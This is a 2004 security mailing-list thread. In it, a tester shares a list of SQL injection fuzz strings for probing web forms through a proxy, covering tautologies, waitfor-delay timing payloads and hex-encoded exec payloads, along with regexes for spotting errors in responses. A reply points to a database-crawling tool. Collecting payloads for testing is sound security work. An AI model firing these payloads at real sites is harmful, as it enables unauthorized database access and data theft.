Re: SQL Injection Strings

["wirepair" <wirepair () roguemail net>]

If you can read C you might wanna take a look at my broken and failed attempt SQLCrawl. Mine was 
more of a crawl the entire db attempt. But hey it might give you some ideas:
http://sh0dan.org/files/sqlcrawl.tar
Hope this helps.

On Fri, 25 Jun 2004 08:01:39 -0700
 "Jeremy Junginger" <jj () act com> wrote:
> Good Morning, 
>
> I'm customizing an http proxy that's feeding some POST parameters into web
> forms to test for SQL injections.  I figured this would be the group to help
> put together a comprehensive list of "fuzz strings" to feed into the forms to
> test them.  Here's what I have so far.  I know it's far from complete.
> Please add any additional strings that you think may be helpful, or perhaps a
> link to an archived thread that has already discussed this?!?:
>
> 'sqlvuln
> '+sqlvuln
> sqlvuln;
> (sqlvuln)
> a' or 1=1--
> a" or 1=1--
> a" or "a" = "a
> a' or 'a' = 'a
> 1 or 1=1
> a' waitfor delay '0:0:10'--
> 1 waitfor delay '0:0:10'--
> declare @q nvarchar (4000) select @q =
> 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0
> 031003000270000
> declare @s varchar(22) select @s =
> 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
> declare @q nvarchar (4000) select @q =
> 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
> declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e
> exec(@s)
>
> And if you're feeling even more generous, perhaps you have some suggestions
> on checking the response.  I'm doing a regex search for the following to
> determine interesting strings.  Of course I still have to take a look at some
> of the 200 responses to see if the waitfor and version commands worked :)
>
> HTTP/[0-9].[0-9] 500
> [Ee]rror
> (My)?SQL
>
> Thanks guys!
>
> -Jeremy

--
Visit Things From Another World for the best
comics, movies, toys, collectibles and more.
http://www.tfaw.com/?qt=wmf